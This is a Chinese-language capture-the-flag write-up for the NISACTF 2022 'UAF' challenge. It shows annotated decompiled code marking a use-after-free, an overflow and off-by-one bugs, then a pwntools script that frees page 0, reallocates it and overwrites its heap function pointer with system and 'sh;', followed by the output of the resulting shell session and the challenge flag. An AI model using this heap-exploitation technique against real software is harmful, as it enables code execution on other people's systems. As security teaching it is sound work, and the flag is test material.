
[NISACTF 2022]UAF

2026-01-09 03:24By
probie
UAF DoubleFree

[NISACTF 2022]UAF

解题过程

信息搜集

file pwn
pwn: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=85bd87e16a35c0c05064a1a0938f6115b8b3b2be, not stripped

分析

  • Linux32位小端序

查看源码

// Menu loop of the challenge binary (decompiler output, reformatted).
// Reads a choice with scanf("%d") and dispatches to create/edit/del/show;
// the return value of scanf is not checked, so a non-numeric token leaves
// v3[0] at its previous value and the menu repeats the same action.
int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
    _DWORD v3[4]; // [esp+8h] [ebp-10h] BYREF

    v3[1] = __readgsdword(0x14u); // stack-protector canary copy
    setbuf(stdin, 0);
    setbuf(stdout, 0);
    for ( ;; )
    {
        puts("1.create");
        puts("2.edit");
        puts("3.delete");
        puts("4.show");
        putchar(58); // ':' prompt
        __isoc99_scanf("%d", v3);
        switch ( v3[0] )
        {
            case 1:
                create();
                break;
            case 2:
                edit();
                break;
            case 3:
                del();
                break;
            case 4:
                show();
                break;
            default:
                puts("Invalid choice");
                break;
        }
    }
}
// Menu option 1: allocate an 8-byte chunk for slot i (0..9) and advance i.
// Slot 0 is special: it is initialised with a 4-byte value, a NUL, and the
// address of echo at offset 4, which show() later dispatches through.
// The malloc() result is never checked for NULL.
int create()
{
    int result; // eax
    int v1; // ebx
    char *v2; // eax

    printf("you are creating the %d page\n", i);
    result = i; // out-of-range i falls through and is returned unchanged, with no message
    if ( i >= 0 )
    {
        result = i; // decompiler artifact: same assignment repeated
        if ( i <= 9 )
        {
            v1 = i;
            (&page)[v1] = (char *)malloc(8u); // 8-byte chunk; edit() later writes into it with an unbounded "%s"
            if ( i )
            {
                // Unreachable: here i is already known to be in 1..9.
                if ( i <= 0 || i > 9 )
                {
                    return puts("NO PAGE");
                }
                else
                {
                    puts("Good cretation!");
                    return ++i;
                }
            }
            else
            {
                // Slot 0 layout: bytes 0..3 = constant, byte 4 = 0 (immediately
                // overwritten), bytes 4..7 = address of echo.
                v2 = page;
                *(_DWORD *)page = 1868654951;
                v2[4] = 0;
                *((_DWORD *)page + 1) = echo; // function pointer kept in heap memory; see show()
                puts("The init page");
                return ++i;
            }
        }
    }
    return result;
}
// Menu option 2: overwrite the chunk behind slot v1 with a string.
// Slot 0 is rejected (v1 <= 0), so the init page can only be changed
// indirectly. The upper bound is off by one: create() stores at index i and
// then increments it, so live slots are 0..i-1 but v1 == i is accepted here.
unsigned int edit()
{
    int v1; // [esp+8h] [ebp-10h] BYREF; not initialised, so an unchecked scanf failure leaves it indeterminate
    unsigned int v2; // [esp+Ch] [ebp-Ch]; stack-protector canary copy

    v2 = __readgsdword(0x14u);
    puts("Input page");
    __isoc99_scanf("%d", &v1);
    if ( v1 <= 0 || v1 > i )
    {
        puts("NO PAGE");
    }
    else
    {
        puts("Input your strings");
        // "%s" has no field width, but the chunk is malloc(8u) in create():
        // any input longer than 7 bytes overruns the chunk. Mitigation: bound
        // the conversion to the chunk size (e.g. "%7s") or use fgets/fread.
        __isoc99_scanf("%s", (&page)[v1]);
    }
    return __readgsdword(0x14u) ^ v2; // canary check
}
// Menu option 3: free the chunk behind slot v1.
// Unlike edit(), slot 0 is accepted. Same off-by-one as edit(): v1 == i names
// a slot create() has not filled yet.
unsigned int del()
{
    int v1; // [esp+8h] [ebp-10h] BYREF; not initialised, so an unchecked scanf failure leaves it indeterminate
    unsigned int v2; // [esp+Ch] [ebp-Ch]; stack-protector canary copy

    v2 = __readgsdword(0x14u);
    puts("Input page");
    __isoc99_scanf("%d", &v1);
    if ( v1 < 0 || v1 > i )
        puts("NO PAGE");
    else
        // The slot keeps the stale pointer after free(): show()/edit() on the
        // same index operate on freed memory, and a second del() on it is a
        // double free. Mitigation: clear the slot right after free().
        free((&page)[v1]);
    return __readgsdword(0x14u) ^ v2; // canary check
}
// Menu option 4: print the chunk behind slot v1.
// Slots 1..i go through echo(). Slot 0 instead calls whatever function
// pointer sits at offset 4 of the init chunk (set to echo by create()), with
// the chunk itself as argument. That pointer lives in heap memory, so it is
// only trustworthy while nothing else can write that chunk; a chunk freed by
// del() and handed out again by create() is writable through edit().
// Mitigation: call echo(page) directly instead of dispatching through the heap.
// Same off-by-one as edit()/del(): v1 == i is accepted.
unsigned int show()
{
    int v1; // [esp+8h] [ebp-10h] BYREF; not initialised, so an unchecked scanf failure leaves it indeterminate
    unsigned int v2; // [esp+Ch] [ebp-Ch]; stack-protector canary copy

    v2 = __readgsdword(0x14u);
    puts("Input page");
    __isoc99_scanf("%d", &v1);
    if ( v1 )
    {
        if ( v1 <= 0 || v1 > i )
            puts("NO PAGE");
        else
            echo((&page)[v1]); // no NULL/freed check on the slot
    }
    else
    {
        // Indirect call through the pointer stored at page+4 by create().
        (*((void (__cdecl **)(char *))page + 1))(page);
    }
    return __readgsdword(0x14u) ^ v2; // canary check
}

分析

  • del函数free后没将指针置空,存在UAF漏洞可利用
    if ( v1 < 0 || v1 > i ) puts("NO PAGE"); else free((&page)[v1]); return __readgsdword(0x14u) ^ v2;
  • show函数存在任意执行漏洞可利用,但只能利用index == 0的堆块
    if ( v1 ) { if ( v1 <= 0 || v1 > i ) puts("NO PAGE"); else echo((&page)[v1]); } else { (*((void (__cdecl **)(char *))page + 1))(page); } return __readgsdword(0x14u) ^ v2;
  • 我们选择先创建0,然后free掉0,再创建1覆盖0,通过给1写入4字节的sh;\x00+四字节的p32(plt@system)来修改0的内容,进而show出0来执行我们的payload

最终脚本

# Writeup PoC for the challenge instance named in the post; the steps mirror
# the analysis above (create 0, free 0, create 1 over it, edit 1, show 0).
from pwn import *

r = remote("node4.anna.nssctf.cn", 29483)
elf = ELF("./pwn")

r.sendline(b"1")  # 0 malloc 8
# free 0
r.sendline(b"3")
r.sendline(b"0")
r.sendline(b"1")  # 1->0 malloc 8
# edit 1->0 system("/bin/sh\x00")
r.sendline(b"2")
r.sendline(b"1")
r.sendline(b"sh;\x00" + p32(elf.sym["system"]))  # plt@system = 0x80484E0
# show 0
r.sendline(b"4")
r.sendline(b"0")
r.interactive()
D:\Environment\python\python-3.13.0-amd64\python.exe D:\Work\test\testPython\src\com\probie\test01\Main.py [x] Opening connection to node4.anna.nssctf.cn on port 29483 [x] Opening connection to node4.anna.nssctf.cn on port 29483: Trying 1.14.71.254 [+] Opening connection to node4.anna.nssctf.cn on port 29483: Done [*] 'D:\\Work\\test\\testPython\\src\\com\\probie\\test01\\pwn' Arch: i386-32-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x8048000) Stripped: No [*] Switching to interactive mode 1.create 2.edit 3.delete 4.show :you are creating the 0 page The init page 1.create 2.edit 3.delete 4.show :Input page 1.create 2.edit 3.delete 4.show :you are creating the 1 page Good cretation! 1.create 2.edit 3.delete 4.show :Input page Input your strings 1.create 2.edit 3.delete 4.show :Input page ls bin dev flag lib lib32 lib64 pwn cat flag NSSCTF{b5138e1c-0692-499a-9b85-c9086911e2d4}

得到:NSSCTF{b5138e1c-0692-499a-9b85-c9086911e2d4}
